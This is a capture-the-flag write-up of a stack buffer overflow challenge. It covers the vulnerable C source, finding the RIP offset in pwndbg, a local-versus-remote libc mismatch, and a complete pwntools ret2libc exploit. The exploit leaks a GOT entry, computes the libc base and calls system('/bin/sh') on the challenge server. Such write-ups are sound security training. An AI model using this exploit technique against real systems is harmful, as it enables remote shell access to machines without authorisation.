Write-up of the challenge “basic_rop_x64”#

This challenge is part of the “Binary exploitation” category and is in Level 2.

Goal of the challenge#

The objective of this challenge is to ROP after finding the libc base and overwrite the RIP to a shell.

Program structure#

1
#include <stdio.h>
2
#include <stdlib.h>
3
#include <signal.h>
4
#include <unistd.h>
5

6

7
void alarm_handler() {
8
    puts("TIME OUT");
9
    exit(-1);
10
}
11

12

13
void initialize() {
14
    setvbuf(stdin, NULL, _IONBF, 0);
15
    setvbuf(stdout, NULL, _IONBF, 0);
16

17
    signal(SIGALRM, alarm_handler);
18
    alarm(30);
19
}
20

21
int main(int argc, char *argv[]) {
22
    char buf[0x40] = {};
23

24
    initialize();
25

26
    read(0, buf, 0x400);
27
    write(1, buf, sizeof(buf));
28

29
    return 0;
30
}

Security breach#

The vulnerability here is:

1
read(0, buf, 0x400);

It is a bof where the buff is 0x40 and we are reading 0x400.

Problem#

The problem I had was very strange. I was almost certain that I did the correct ROP so I decided what if the authors did something wrong? After some debuggning turns out that when we are runing this locally we should have libc /lib/x86_64-linux-gnu/libc.so.6 and when remote we should have it libc.so.6. I came to this coclusion when I realized that the libc base was not page aligned when using libc.so.6 but was page aligned when using /lib/x86_64-linux-gnu/libc.so.6 locally.

I did a simple check: If the libc ends with 000, then it should be healthy, if it isn’t then something is wrong!

1
With libc.so.6 locally
2
┌──(venv_lin)(abdullah㉿Abdullah)-[/mnt/d/chals/Dreamhack/pwn/basic_rop_x64]
3
└─$ python3 solve.py
4
0x7ff28a643c10
5
[*] Switching to interactive mode
6

7
With /lib/x86_64-linux-gnu/libc.so.6 locally
8
┌──(venv_lin)(abdullah㉿Abdullah)-[/mnt/d/chals/Dreamhack/pwn/basic_rop_x64]
9
└─$ python3 solve.py
10
0x7f4714f4a000
11
[*] Got EOF while reading in interactive
12
$

Bingo!, my predication was right and for the local we should use /lib/x86_64-linux-gnu/libc.so.6 and for the remote we should use libc.so.6.

Solution#

First I started off by finding the offset to RIP:

1
pwndbg ./basic_rop_x64
2
pwndbg> cyclic 400
3
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaab
4
pwndbg> r
5
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaab
6
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaa
7

8
RBP  0x6161616161616169 ('iaaaaaaa')
9

10

11
pwndbg> cyclic -o iaaaaaaa
12
Finding cyclic pattern of 8 bytes: b'iaaaaaaa' (hex: 0x6961616161616161)
13
Found at offset 64

Notice how it crashed at RBP, we need to add 8 bytes to reach the RIP, which gives us the offset 72.

So our goal here is very simple. First we add padding to reach the RIP, then we use puts_plt to leak the read_got which we know it 100% exists from the source code:

1
read(0, buf, 0x400);

After that we come back to main and get our leak. We take into consideration that the libc base starts with 7f and we should read it backward because it is little endian. I did some debugging and found out that there is two garbage bytes which we will skip therefore we would be reading the last 6 bytes when reaching 7f. After getting the base, we subtract it from the read in the libc. After it we just add padding to reach the RIP and then execute system(‘/bin/sh’).

The important part is that we are going to use libc.so.6 for the remote because it is page aligned there.

1
from pwn import *
2

3
# p = process('./basic_rop_x64')
4

5
p = remote('host8.dreamhack.games', 18873)
6

7
e = ELF('./basic_rop_x64')
8

9
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
10

11
libc = ELF('./libc.so.6')
12

13
rop = ROP(e)
14

15
pop_rdi = rop.find_gadget(['pop rdi'])[0]
16
read_got = e.got['read']
17
puts_plt = e.plt['puts']
18
main = e.sym['main']
19
ret = rop.find_gadget(['ret'])[0]
20

21
offset_RIP = 72
22

23
payload = b'A' * offset_RIP
24
payload += p64(pop_rdi)
25
payload += p64(read_got)
26
payload += p64(puts_plt)
27
payload += p64(main)
28
p.sendline(payload)
29

30
# Hop over our padding
31
p.recv(offset_RIP - 8)
32

33
leak = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
34
base = leak - libc.symbols['read']
35

36
# print(hex(base))
37

38
binsh = base + next(libc.search(b'/bin/sh'))
39
libc.address = base
40
system = libc.symbols['system']
41

42

43
payload = b'A' * offset_RIP
44
payload += p64(ret)
45
payload += p64(pop_rdi)
46
payload += p64(binsh)
47
payload += p64(system)
48
p.sendline(payload)
49

50
p.interactive()